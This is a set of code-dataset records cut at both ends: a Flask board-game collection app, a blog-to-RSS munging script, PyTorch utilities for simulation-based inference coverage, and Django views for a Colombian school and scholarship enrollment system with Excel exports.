read_data_file(\"data/games.csv\")\n app.config[\"bga_client_id\"] = environ[\"BGA_CLIENT_ID\"]\n\n return app\n\n\napp = create_app()\n\n\n@app.get(\"/\")\ndef index():\n all_games = app.config[\"all_games\"]\n chosen_games = session.get(\"chosen_games\", [])\n if not chosen_games:\n return render_template(\"base.html\", games=all_games.values())\n return render_template(\n \"games.html\", games=all_games.values(), collection=chosen_games\n )\n\n\n@app.post(\"/addgame\")\ndef read_user_selection():\n all_games = app.config[\"all_games\"]\n response = make_response(redirect(url_for(\"index\"), code=303))\n game_title = request.form.get(\"game\")\n game_info_bga = requests.get(\n f\"https://api.boardgameatlas.com/api/search?name={game_title}&client_id={app.config['bga_client_id']}\"\n )\n game_min_age = 0\n try:\n game_min_age = game_info_bga.json()[\"games\"][0][\"min_age\"]\n except Exception:\n pass\n chosen_games = session.get(\"chosen_games\", [])\n new_game = all_games[game_title]\n new_game[\"min_age\"] = game_min_age\n chosen_games.append(new_game)\n session[\"chosen_games\"] = chosen_games\n\n return response\n\n\n@app.get(\"/api/v1/games/all\")\ndef get_all_games():\n all_games = app.config[\"all_games\"]\n return all_games\n\n\n@app.get(\"/api/v1/games/my\")\ndef get_user_games():\n chosen_games = session.get(\"chosen_games\", [])\n return jsonify(chosen_games)\n","sub_path":"examples/bgrk2/bgrk.py","file_name":"bgrk.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"327917732","text":"import json\nimport app\nfrom datetime import datetime\n\ndat = app.post_list\nfor post in dat:\n datetime_obj = post['date']\n post['month'] = datetime_obj.month\n post['day'] = datetime_obj.day\n post['year'] = datetime_obj.year\n del post['date']\n del post['template']\n post['route'] = '//residentmar.io/' + post['route']\n\nwith open('./static/json/post_list.json', 'w') as outfile:\n json.dump(dat, outfile, indent=4)\n\nxml = \"\"\"\n\n\n\nData Hacks\nhttp://www.residentmar.io/\nData hacks and other musings by Aleksey Bilogur\n\"\"\"\n\nfor post in dat:\n xml += \"\"\"\n \n {0}\n {1}\n {1}\n {2}\n \"\"\".format(post['title'], 'http:' + post['route'], datetime(post['year'], post['month'],\n post['day']).strftime('%a, %d %b %Y %H:00:00 EST'))\n xml += \"\"\"\"\"\"\n\nxml += 
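# Hedged sketch: read_data_file in the bgrk record above is wrapped in
# functools.cache, so the CSV is parsed once per process and every later call
# with the same filename reuses the in-memory result:
from functools import cache

@cache
def read_once(path):
    with open(path) as f:     # executed only on the first call per distinct path
        return f.read()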
\"\"\"\n\n\n\"\"\"\n\nwith open('./static/json/post_list.json', 'w') as outfile:\n json.dump(dat, outfile, indent=4)\n\nwith open('./templates/rss.xml', 'w') as outfile:\n outfile.write(xml)","sub_path":"munge_posts.py","file_name":"munge_posts.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"478100895","text":"import numpy as np\nimport os\nimport torch\nimport glob\nimport pickle\n\nfrom hypothesis.benchmark.tractable_small import Prior\nfrom hypothesis.benchmark.tractable_small import Simulator\nfrom hypothesis.nn.ratio_estimation import expectation_marginals_ratio\n\nfrom ratio_estimation import DatasetJointTest as Dataset\nfrom ratio_estimation import coverage\nfrom ratio_estimation import load_estimator\n\nfrom sbc import sbc_run\n\n\n@torch.no_grad()\ndef simulate(n=10000, directory=\".\"):\n simulator = Simulator()\n prior = Prior()\n inputs = prior.sample((n,)).cpu()\n outputs = simulator(inputs)\n if directory is not None:\n if not os.path.exists(directory):\n os.makedirs(directory)\n np.save(directory + \"/inputs.npy\", inputs.numpy())\n np.save(directory + \"/outputs.npy\", outputs.numpy())\n\n return inputs, outputs\n\n\nclass FlowEnsemble():\n def __init__(self, flows):\n self.flows = flows\n\n def log_prob(self, *args, **kwargs):\n posteriors = [flow.log_prob(*args, **kwargs) for flow in self.flows]\n return torch.stack(posteriors, axis=0).exp().mean(axis=0).log()\n\nclass CpuPrior():\n def __init__(self, prior):\n self.prior = prior\n\n def log_prob(self, samples):\n return self.prior.log_prob(samples).cpu()\n\n\n@torch.no_grad()\ndef coverage_of_estimator(path_to_weights, cl_list=[0.95], reduce=\"ratio_mean\", flow_sbi=False, max_samples=None):\n if flow_sbi:\n paths = glob.glob(path_to_weights)\n flows = [pickle.load(open(path, \"rb\")) for path in paths]\n for flow in flows:\n flow._prior = CpuPrior(flow._prior)\n\n if len(flows) > 1:\n r = FlowEnsemble(flows)\n else:\n r = flows[0]\n\n else:\n r = load_estimator(path_to_weights, reduce=reduce)\n\n d = Dataset()\n\n if max_samples is None:\n inputs = d[:][\"inputs\"]\n outputs = d[:][\"outputs\"]\n else:\n inputs = d[:max_samples][\"inputs\"]\n outputs = d[:max_samples][\"outputs\"]\n\n alphas = [1 - cl for cl in cl_list]\n emperical_coverage = coverage(r, inputs, outputs, alphas,flow_sbi=flow_sbi)\n\n return emperical_coverage\n\n\n@torch.no_grad()\ndef measure_diagnostic(r, n=100000):\n d = Dataset()\n\n return expectation_marginals_ratio(d, r, n=n)\n\n@torch.no_grad()\ndef importance_posterior_sampling(prior, posterior, nb_samples, nb_gen_samples):\n init_samples = prior.sample((nb_gen_samples,))\n weights = (posterior.log_prob(init_samples).squeeze() - prior.log_prob(init_samples).squeeze()).exp().numpy().squeeze()\n weights = weights/weights.sum()\n indices = np.arange(len(init_samples))\n samples_indices = np.random.choice(indices, size=nb_samples, replace=False, p=weights)\n samples = init_samples[samples_indices, :]\n\n return samples\n\n@torch.no_grad()\ndef compute_sbc(path_to_weights, nb_rank_samples, nb_posterior_samples, save_name, reduce=\"ratio_mean\", flow_sbi=False):\n prior = Prior()\n simulator = Simulator()\n\n if flow_sbi:\n paths = glob.glob(path_to_weights)\n flows = [pickle.load(open(path, \"rb\")) for path in paths]\n for flow in flows:\n flow._prior = CpuPrior(flow._prior)\n\n if len(flows) > 1:\n flow_posterior = FlowEnsemble(flows)\n else:\n flow_posterior = flows[0]\n\n class 
FlowPosterior():\n def __init__(self, x, flow):\n self.x = x\n self.flow = flow\n\n def log_prob(self, theta):\n tmp = self.flow.log_prob(theta, x=self.x, norm_posterior=False)[0]\n assert(tmp.shape == (len(theta),))\n return tmp\n\n\n def sample_posterior(x, nb_samples):\n posterior = FlowPosterior(x, flow_posterior)\n return importance_posterior_sampling(prior, posterior, nb_samples, nb_samples*100)\n\n else:\n r = load_estimator(path_to_weights, reduce=reduce)\n\n class RatioPosterior():\n def __init__(self, x, prior, ratio):\n self.x = x\n self.prior = prior\n self.ratio = ratio\n\n def log_prob(self, theta):\n outputs = self.x.repeat(len(theta), 1, 1, 1).float()\n return self.prior.log_prob(theta) + self.ratio.log_ratio(inputs=theta, outputs=outputs)\n\n def sample_posterior(x, nb_samples):\n posterior = RatioPosterior(x, prior, r)\n return importance_posterior_sampling(prior, posterior, nb_samples, nb_samples*100)\n\n sbc_run(prior, simulator, sample_posterior, nb_rank_samples, nb_posterior_samples, save_name)\n","sub_path":"workflows/coverage_simulations_and_bias_reduction/slcp/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"160268619","text":"# -*- encoding: utf-8 -*-\nfrom unittest import result\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, render_to_response\nfrom django.http import HttpResponseRedirect,HttpResponse\nfrom django.template import RequestContext\nfrom django.contrib.auth.hashers import make_password\nfrom .models import Usuario\nfrom .models import Persona\nfrom .models import docente,Alumno2,Grado,Sisben,Estrato,Municipios,Veredas,Universidades,Colegios,CentrosSena,FormularioEstimulos,Sedes,\\\nCentrosSena,Horas,Fechas,Traza,Grupos2,Grado,Inst_educativas2,SedeInstitucion2,Video\nfrom validators import Validator, FormLoginValidator\nfrom django.contrib import auth\nimport xhtml2pdf.pisa as pisa\nfrom StringIO import StringIO\nfrom django.template.loader import render_to_string\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import get_object_or_404\nfrom django.http import JsonResponse\nfrom django.core import serializers\nimport json\nfrom django.db.models import Q\nfrom openpyxl import Workbook\nfrom django.contrib.auth.decorators import permission_required\n# Create your views here.\ndef login(request):\n \"\"\"view del login\n \"\"\"\n #Verificamos que los datos lleguen por el methodo POST\n\n if request.method == 'POST':\n #Cargamos el formulario (ver forms.py con los datos del POST)\n validator = FormLoginValidator(request.POST)\n #formulario = LoginForm(data = request.POST)\n #Verificamos que los datos esten correctos segun su estructura\n\n if validator.is_valid():\n # Capturamos las variables que llegan por POST\n\n auth.login(request, validator.acceso) # Crear una sesion\n return HttpResponseRedirect(request.POST['next'])\n else:\n return render_to_response('login.html', {'error': validator.getMessage() } , context_instance = RequestContext(request))\n next = '/portada'\n if 'next' in request.GET:\n next = request.GET['next']\n\n return render_to_response('login.html', {'next': next} ,context_instance = RequestContext(request))\n\n@permission_required('Usuario.can_add_Usuario', login_url = '/login')\ndef registro(request):\n if request.method == 'POST':\n validators = Validator(request.POST)\n validators.required = ['nombre','user','password']\n if 
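# Hedged sketch (synthetic densities): importance_posterior_sampling above is
# self-normalized importance resampling -- weight proposal draws by
# exp(log target - log proposal), normalize, then resample indices by weight.
# Target N(0, 1), proposal N(0, 3):
import numpy as np

rng = np.random.default_rng(0)
x = rng.normal(0.0, 3.0, size=20000)
log_w = -0.5 * x**2 - (-0.5 * (x / 3.0) ** 2 - np.log(3.0))  # log p - log q, up to a constant
w = np.exp(log_w - log_w.max())                              # subtract max for stability
w /= w.sum()
idx = rng.choice(x.size, size=1000, replace=True, p=w)       # the record uses replace=False
print(x[idx].mean(), x[idx].std())                           # ~0, ~1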
validators.is_valid():\n usuario = Usuario()\n usuario.first_name = request.POST['nombre']\n usuario.last_name = request.POST['apellido']\n usuario.username = request.POST['user']\n usuario.email = request.POST['email']\n usuario.password = make_password(request.POST['password'])\n usuario.is_active = True\n usuario.save()\n return render_to_response('portada.html',context_instance = RequestContext(request))\n else:\n return render_to_response('registrarse.html', {'error': validator.getMessage() } , context_instance = RequestContext(request))\n return render_to_response('formulario.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef persona(request):\n if request.method == 'POST':\n validators = Validator(request.POST)\n validators.required = ['nombre','apellido','documento','email','sexo']\n if validators.is_valid():\n alumno = Alumno()\n alumno.nombres = request.POST['nombre']\n alumno.apellidos = request.POST['apellido']\n alumno.documento = request.POST['documento']\n alumno.email = request.POST['email']\n alumno.sexo = request.POST['sexo']\n alumno.save()\n print(alumno.nombres)\n else:\n return render_to_response('registrarse.html', {'error': validator.getMessage() } , context_instance = RequestContext(request))\n return render_to_response('formulario.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef inicio(request):\n return render_to_response('inicio.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuraMatricula(request):\n return render_to_response('configuraMatriculas.html',context_instance = RequestContext(request))\n\ndef passwordResetForm(request):\n return render_to_response('passwordResetForm.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuraInstitucion(request):\n instituciones = Inst_educativas2.objects.all()\n if request.method == 'POST':\n institucion = Inst_educativas2()\n institucion.nombre = request.POST['institucion']\n institucion.save()\n return render_to_response('configuraInstitucion.html',{'instituciones':instituciones}, context_instance = RequestContext(request))\n return render_to_response('configuraInstitucion.html',{'instituciones':instituciones}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarInstitucion(request, pk):\n institucion = get_object_or_404(Inst_educativas2, pk=pk)\n if request.method == 'POST':\n Inst_educativa = get_object_or_404(Inst_educativas2, pk=pk)\n Inst_educativa.nombre = request.POST['institucion']\n Inst_educativa.direccion = request.POST['direccion']\n Inst_educativa.save()\n instituciones = Inst_educativas2.objects.all()\n return render_to_response('configuraInstitucion.html',{'instituciones':instituciones}, context_instance = RequestContext(request))\n return render_to_response('editarInstitucion.html',{'institucion':institucion}, context_instance = RequestContext(request))\n\n@permission_required('Inst_educativas2.can_delete_Inst_educativas2', login_url = '/login')\ndef eliminarInstitucion(request, pk):\n institucion = get_object_or_404(Inst_educativas2, pk=pk)\n if request.method == 'POST':\n institucion.delete()\n instituciones = Inst_educativas2.objects.all()\n return render_to_response('configuraInstitucion.html',{'instituciones':instituciones}, context_instance = RequestContext(request))\n return render_to_response('eliminarInstitucion.html',{'institucion':institucion}, 
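# Hedged note: these views use the older Django idiom
# render_to_response(template, ctx, context_instance=RequestContext(request)),
# which later Django versions removed. The equivalent modern one-liner is
# render(), sketched here for the simplest view above:
from django.shortcuts import render

def inicio(request):
    return render(request, 'inicio.html')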
context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuraGrado(request):\n grados = Grado.objects.all()\n if request.method == 'POST':\n grado = Grado()\n grado.grado = request.POST['grado']\n grado.save()\n return render_to_response('configuraGrado.html',{'grados':grados}, context_instance = RequestContext(request))\n return render_to_response('configuraGrado.html',{'grados':grados}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarGrado(request, pk):\n grado = get_object_or_404(Grado, pk=pk)\n if request.method == 'POST':\n grado = get_object_or_404(Grado, pk=pk)\n grado.grado = request.POST['grado']\n grado.save()\n grados = Grado.objects.all()\n return render_to_response('configuraGrado.html',{'grados':grados}, context_instance = RequestContext(request))\n return render_to_response('editarGrado.html',{'grado':grado}, context_instance = RequestContext(request))\n\n@permission_required('Grado.can_delete_Grado', login_url = '/login')\ndef eliminarGrado(request, pk):\n grado = get_object_or_404(Grado, pk=pk)\n if request.method == 'POST':\n grado.delete()\n grados = Grado.objects.all()\n return render_to_response('configuraGrado.html',{'grados':grados}, context_instance = RequestContext(request))\n return render_to_response('eliminarGrado.html',{'grado':grado}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuraSede(request):\n sedes = SedeInstitucion2.objects.all()\n instituciones = Inst_educativas2.objects.all()\n if request.method == 'POST':\n sede = SedeInstitucion2()\n sede.sede = request.POST['sede']\n sede.institucion_id = request.POST['institucion']\n sede.save()\n return render_to_response('configuraSede.html',{'sedes':sedes, 'instituciones':instituciones}, context_instance = RequestContext(request))\n return render_to_response('configuraSede.html',{'sedes':sedes, 'instituciones':instituciones}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarSede(request, pk):\n sede = get_object_or_404(SedeInstitucion2, pk=pk)\n instituciones = Inst_educativas2.objects.all()\n if request.method == 'POST':\n sede = get_object_or_404(SedeInstitucion2, pk=pk)\n sede.sede = request.POST['sede']\n sede.institucion_id = request.POST['institucion']\n sede.save()\n sedes = SedeInstitucion2.objects.all()\n return render_to_response('configuraSede.html',{'sedes':sedes, 'instituciones':instituciones}, context_instance = RequestContext(request))\n return render_to_response('editarSede.html',{'sede':sede, 'instituciones':instituciones}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\n@permission_required('SedeInstitucion2.can_delete_SedeInstitucion2', login_url = '/login')\ndef eliminarSede(request, pk):\n sede = get_object_or_404(SedeInstitucion2, pk=pk)\n if request.method == 'POST':\n sede.delete()\n sedes = SedeInstitucion2.objects.all()\n return render_to_response('configuraSede.html',{'sedes':sedes}, context_instance = RequestContext(request))\n return render_to_response('eliminarSede.html',{'sede':sede}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuraGrupo(request):\n grupos = Grupos2.objects.all()\n grados = Grado.objects.all()\n if request.method == 'POST':\n grupo = Grupos2()\n grupo.grupo = request.POST['grupo']\n grupo.grado_id = request.POST['grado']\n grupo.save()\n return 
render_to_response('configuraGrupo.html',{'grupos':grupos, 'grados':grados}, context_instance = RequestContext(request))\n return render_to_response('configuraGrupo.html',{'grupos':grupos, 'grados':grados}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarGrupo(request, pk):\n grupo = get_object_or_404(Grupos2, pk=pk)\n grados = Grado.objects.all()\n if request.method == 'POST':\n grupo = get_object_or_404(Grupos2, pk=pk)\n grupo.grupo = request.POST['grupo']\n grupo.grado_id = request.POST['grado']\n grupo.save()\n grupos = Grupos2.objects.all()\n return render_to_response('configuraGrupo.html',{'grupos':grupos, 'grados':grados}, context_instance = RequestContext(request))\n return render_to_response('editarGrupo.html',{'grupo':grupo, 'grados':grados}, context_instance = RequestContext(request))\n\n@permission_required('Grupos2.can_delete_Grupos2', login_url = '/login')\ndef eliminarGrupo(request, pk):\n grupo = get_object_or_404(Grupos2, pk=pk)\n if request.method == 'POST':\n grupo.delete()\n grupos = Grupos2.objects.all()\n return render_to_response('configuraGrupo.html',{'grupos':grupos}, context_instance = RequestContext(request))\n return render_to_response('eliminarGrupo.html',{'grupo':grupo}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef busquedas2(request):\n return render_to_response('formulario_exitoso.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef Estatico(request):\n return render_to_response('estatico.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef InformeVarios(request):\n return render_to_response('reportesVarios.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef informeVca(request):\n fechas = Fechas.objects.order_by('fecha','hora')\n wb = Workbook()\n #Definimos como nuestra hoja de trabajo, la hoja activa, por defecto la primera del libro\n ws = wb.active\n #En la celda B1 ponemos el texto 'REPORTE DE PERSONAS'\n\n #Juntamos las celdas desde la B1 hasta la E1, formando una sola celda\n\n #Creamos los encabezados desde la celda B3 hasta la E3\n\n ws['b1'] = 'HORA'\n ws['c1'] = 'FECHA'\n ws['d1'] = 'NOMBRE'\n ws['e1'] = 'APELLIDO'\n ws['f1'] = 'DOCUMENTO'\n cont=4\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n for fecha in fechas:\n ws.cell(row=cont,column=2).value = fecha.hora.hora\n ws.cell(row=cont,column=3).value = fecha.fecha\n ws.cell(row=cont,column=4).value = fecha.nombre.nombre\n ws.cell(row=cont,column=5).value = fecha.nombre.apellido\n ws.cell(row=cont,column=6).value = fecha.nombre.documento\n cont = cont + 1\n\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n\n #Establecemos el nombre del archivo\n nombre_archivo =\"ReporteAgendaEntrevistaExcel.xlsx\"\n #Definimos que el tipo de respuesta a devolver es un archivo de microsoft excel\n response = HttpResponse(content_type=\"application/ms-excel\")\n contenido = \"attachment; filename={0}\".format(nombre_archivo)\n response[\"Content-Disposition\"] = contenido\n wb.save(response)\n return response\n\n@login_required(login_url = \"/login\")\ndef excelAgendados(request):\n fechas = Fechas.objects.order_by('fecha','hora')\n wb = Workbook()\n #Definimos como nuestra hoja de trabajo, la hoja activa, por defecto la primera del libro\n ws = wb.active\n #En la celda B1 ponemos el texto 
'REPORTE DE PERSONAS'\n #Juntamos las celdas desde la B1 hasta la E1, formando una sola celda\n #Creamos los encabezados desde la celda B3 hasta la E3\n ws['b1'] = 'nombre'\n ws['c1'] = 'apellido'\n ws['d1'] = 'tipoDocumento'\n ws['e1'] = 'documento'\n ws['f1'] = 'documentoOtro'\n ws['g1'] = 'email'\n ws['h1'] = 'celular'\n ws['i1'] = 'genero'\n ws['j1'] = 'edad'\n ws['k1'] = 'estadoCivil'\n ws['l1'] = 'cabezaFamilia'\n ws['m1'] = 'hijos'\n ws['n1'] = 'pertenencia'\n ws['o1'] = 'pertenenciaOtro'\n ws['p1'] = 'direccionEstudiante'\n ws['q1'] = 'ciudadEstudiante'\n ws['r1'] = 'barrioEstudiante'\n ws['s1'] = 'ubicacionEstudiante'\n ws['t1'] = 'vivienda'\n ws['u1'] = 'estrato'\n ws['v1'] = 'sisben'\n ws['w1'] = 'nucleoFamiliar'\n ws['x1'] = 'direccionPadres'\n ws['y1'] = 'ciudadPadres'\n ws['z1'] = 'barrioPadres'\n ws['aa1'] = 'ubicacionPadres'\n ws['ab1'] = 'serviciosPublicos'\n ws['ac1'] = 'dependenciaEconomica'\n ws['ad1'] = 'dependenciaOtro'\n ws['ae1'] = 'ingresosFamilia'\n ws['af1'] = 'colegio'\n ws['ag1'] = 'oficialPrivado'\n ws['ah1'] = 'añoTerminacion'\n ws['ai1'] = 'actaGrado'\n ws['aj1'] = 'universidad'\n ws['ak1'] = 'centrosSena'\n ws['al1'] = 'sede'\n ws['am1'] = 'acreditacionUniversidad'\n ws['an1'] = 'carrera'\n ws['ao1'] = 'tecnicaTecnologica'\n ws['ap1'] = 'acreditacionCarrera'\n ws['aq1'] = 'cicloEducacion'\n ws['ar1'] = 'semestreEnCurso'\n ws['as1'] = 'modalidad'\n ws['at1'] = 'modalidadOtro'\n ws['au1'] = 'propedeutico'\n ws['av1'] = 'propedeuticoOtro'\n ws['aw1'] = 'valorMatricula'\n ws['ax1'] = 'beneficiarioprogramas'\n ws['ay1'] = 'programaOtro'\n ws['az1'] = 'incentivoEducativo'\n ws['ba1'] = 'cuantasVeces'\n ws['bb1'] = 'extraAcademicas'\n ws['bc1'] = 'extraAcademicaPaga'\n ws['bd1'] = 'parentesco1'\n ws['be1'] = 'parentesco2'\n ws['bf1'] = 'parentesco3'\n ws['bg1'] = 'parentesco4'\n ws['bh1'] = 'parentesco5'\n ws['bi1'] = 'parentesco6'\n ws['bj1'] = 'parentesco7'\n cont=4\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n for fecha in fechas:\n ws.cell(row=cont,column=2).value = fecha.nombre.nombre\n ws.cell(row=cont,column=3).value = fecha.nombre.apellido\n ws.cell(row=cont,column=4).value = fecha.nombre.tipoDocumento\n ws.cell(row=cont,column=5).value = fecha.nombre.documento\n ws.cell(row=cont,column=6).value = fecha.nombre.documentoOtro\n ws.cell(row=cont,column=7).value = fecha.nombre.email\n ws.cell(row=cont,column=8).value = fecha.nombre.celular\n ws.cell(row=cont,column=9).value = fecha.nombre.genero\n ws.cell(row=cont,column=10).value = fecha.nombre.edad\n ws.cell(row=cont,column=11).value = fecha.nombre.estadoCivil\n ws.cell(row=cont,column=12).value = fecha.nombre.cabezaFamilia\n ws.cell(row=cont,column=13).value = fecha.nombre.hijos\n ws.cell(row=cont,column=14).value = fecha.nombre.pertenencia\n ws.cell(row=cont,column=15).value = fecha.nombre.pertenenciaOtro\n ws.cell(row=cont,column=16).value = fecha.nombre.direccionEstudiante\n ws.cell(row=cont,column=17).value = fecha.nombre.ciudadEstudiante\n ws.cell(row=cont,column=18).value = fecha.nombre.barrioEstudiante\n ws.cell(row=cont,column=19).value = fecha.nombre.ubicacionEstudiante\n ws.cell(row=cont,column=20).value = fecha.nombre.vivienda\n ws.cell(row=cont,column=21).value = fecha.nombre.estrato\n ws.cell(row=cont,column=22).value = fecha.nombre.sisben\n ws.cell(row=cont,column=23).value = fecha.nombre.nucleoFamiliar\n ws.cell(row=cont,column=24).value = fecha.nombre.direccionPadres\n ws.cell(row=cont,column=25).value = fecha.nombre.ciudadPadres\n 
ws.cell(row=cont,column=26).value = fecha.nombre.barrioPadres\n ws.cell(row=cont,column=27).value = fecha.nombre.ubicacionPadres\n ws.cell(row=cont,column=28).value = fecha.nombre.serviciosPublicos\n ws.cell(row=cont,column=29).value = fecha.nombre.dependenciaEconomica\n ws.cell(row=cont,column=30).value = fecha.nombre.dependenciaOtro\n ws.cell(row=cont,column=31).value = fecha.nombre.ingresosFamilia\n ws.cell(row=cont,column=32).value = fecha.nombre.colegio\n ws.cell(row=cont,column=33).value = fecha.nombre.oficialPrivado\n ws.cell(row=cont,column=34).value = fecha.nombre.anoTerminacion\n ws.cell(row=cont,column=35).value = fecha.nombre.actaGrado\n ws.cell(row=cont,column=36).value = fecha.nombre.universidad\n ws.cell(row=cont,column=37).value = fecha.nombre.centrosSena\n ws.cell(row=cont,column=38).value = fecha.nombre.sede\n ws.cell(row=cont,column=39).value = fecha.nombre.acreditacionUniversidad\n ws.cell(row=cont,column=40).value = fecha.nombre.carrera\n ws.cell(row=cont,column=41).value = fecha.nombre.tecnicaTecnologica\n ws.cell(row=cont,column=42).value = fecha.nombre.acreditacionCarrera\n ws.cell(row=cont,column=43).value = fecha.nombre.cicloEducacion\n ws.cell(row=cont,column=44).value = fecha.nombre.semestreEnCurso\n ws.cell(row=cont,column=45).value = fecha.nombre.modalidad\n ws.cell(row=cont,column=46).value = fecha.nombre.modalidadOtro\n ws.cell(row=cont,column=47).value = fecha.nombre.propedeutico\n ws.cell(row=cont,column=48).value = fecha.nombre.propedeuticoOtro\n ws.cell(row=cont,column=49).value = fecha.nombre.valorMatricula\n ws.cell(row=cont,column=50).value = fecha.nombre.beneficiarioprogramas\n ws.cell(row=cont,column=51).value = fecha.nombre.programaOtro\n ws.cell(row=cont,column=52).value = fecha.nombre.incentivoEducativo\n ws.cell(row=cont,column=53).value = fecha.nombre.cuantasVeces\n ws.cell(row=cont,column=54).value = fecha.nombre.extraAcademicas\n ws.cell(row=cont,column=55).value = fecha.nombre.extraAcademicaPaga\n ws.cell(row=cont,column=56).value = fecha.nombre.parentesco1\n ws.cell(row=cont,column=57).value = fecha.nombre.parentesco2\n ws.cell(row=cont,column=58).value = fecha.nombre.parentesco3\n ws.cell(row=cont,column=59).value = fecha.nombre.parentesco4\n ws.cell(row=cont,column=60).value = fecha.nombre.parentesco5\n ws.cell(row=cont,column=61).value = fecha.nombre.parentesco6\n ws.cell(row=cont,column=62).value = fecha.nombre.parentesco7\n cont = cont + 1\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n #Establecemos el nombre del archivo\n nombre_archivo =\"ReporteAgendadosExcel.xlsx\"\n #Definimos que el tipo de respuesta a devolver es un archivo de microsoft excel\n response = HttpResponse(content_type=\"application/ms-excel\")\n contenido = \"attachment; filename={0}\".format(nombre_archivo)\n response[\"Content-Disposition\"] = contenido\n wb.save(response)\n return response\n\n@login_required(login_url = \"/login\")\ndef informeAlumnos(request):\n alumnos = Alumno2.objects.all()\n wb = Workbook()\n #Definimos como nuestra hoja de trabajo, la hoja activa, por defecto la primera del libro\n ws = wb.active\n #En la celda B1 ponemos el texto 'REPORTE DE PERSONAS'\n\n #Juntamos las celdas desde la B1 hasta la E1, formando una sola celda\n\n #Creamos los encabezados desde la celda B3 hasta la E3\n\n ws['b1'] = 'PROCEDENCIA'\n ws['c1'] = 'INSTITUCION'\n ws['d1'] = 'SEDE'\n ws['e1'] = 'NOMBRES'\n ws['f1'] = 'APELLIDOS'\n ws['g1'] = 'DOCUMENTO'\n ws['h1'] = 'GRADO'\n ws['i1'] = 'GENERO'\n ws['j1'] = 
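# Hedged sketch: the dozens of per-column assignments above can be driven from a
# field-name list with enumerate + getattr, which keeps the header row and the
# data rows in sync (fields shown are a subset of those used in the record):
FIELDS = ["nombre", "apellido", "tipoDocumento", "documento", "email"]

def write_row(ws, row, obj, fields=FIELDS, first_col=2):
    for offset, field in enumerate(fields):
        ws.cell(row=row, column=first_col + offset).value = getattr(obj, field)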
'TRANSPORTE'\n cont=4\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n for alumno in alumnos:\n ws.cell(row=cont,column=2).value = alumno.procedencia.vereda\n ws.cell(row=cont,column=3).value = alumno.institucion.nombre\n ws.cell(row=cont,column=4).value = alumno.sede.sede\n ws.cell(row=cont,column=5).value = alumno.nombres\n ws.cell(row=cont,column=6).value = alumno.apellidos\n ws.cell(row=cont,column=7).value = alumno.documento\n ws.cell(row=cont,column=8).value = alumno.grado.grado\n ws.cell(row=cont,column=9).value = alumno.genero\n ws.cell(row=cont,column=10).value = alumno.transporte\n cont = cont + 1\n\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n\n #Establecemos el nombre del archivo\n nombre_archivo =\"ReporteAgendaEntrevistaExcel.xlsx\"\n #Definimos que el tipo de respuesta a devolver es un archivo de microsoft excel\n response = HttpResponse(content_type=\"application/ms-excel\")\n contenido = \"attachment; filename={0}\".format(nombre_archivo)\n response[\"Content-Disposition\"] = contenido\n wb.save(response)\n return response\n\n@login_required(login_url = \"/login\")\ndef informe(request):\n return render_to_response('informe.html',context_instance = RequestContext(request))\n\ndef validaDocumento(request):\n sisben = Sisben.objects.all()\n estrato = Estrato.objects.all()\n municipio = Municipios.objects.all().order_by()\n universidad = Universidades.objects.all()\n vereda = Veredas.objects.all()\n colegio = Colegios.objects.all()\n sedes = Sedes.objects.all()\n centrosSena = CentrosSena.objects.all()\n if request.method == 'POST':\n documento = request.POST['busqueda'] #campo de busqueda de documento de estudiantes\n aspirante = FormularioEstimulos.objects.filter(documento = documento)\n if (len(aspirante)>=1): #si ya se inscribio en estimulos\n fechas = Fechas.objects.all() #fechas de agendamiento\n fechasAgendadas = []\n for f in fechas:\n fechasAgendadas.append(f.nombre.id)\n if (aspirante[0].id in fechasAgendadas): #validar si aspirante ya esta agendado\n nombreAgendado = aspirante[0].nombre\n documen = aspirante[0].documento\n return render_to_response('formulario_exitoso.html',{'nombreAgendado' :nombreAgendado, 'documen':documen}, context_instance=RequestContext(request))\n #aspiranteEstimulo = FormularioEstimulos.objects.get(id = aspirante[0].id )\n #import pdb; pdb.set_trace()\n #return render_to_response('editarFormulario.html',{'aspiranteEstimulo':aspiranteEstimulo, 'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena }, context_instance=RequestContext(request))\n else: #sino esta gendado enviar a formulario de estimulos\n aspiranteEstimulo = FormularioEstimulos.objects.get(id = aspirante )\n return render_to_response('resultadoBusquedaUsuario.html',{'aspiranteEstimulo':aspiranteEstimulo, 'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena }, 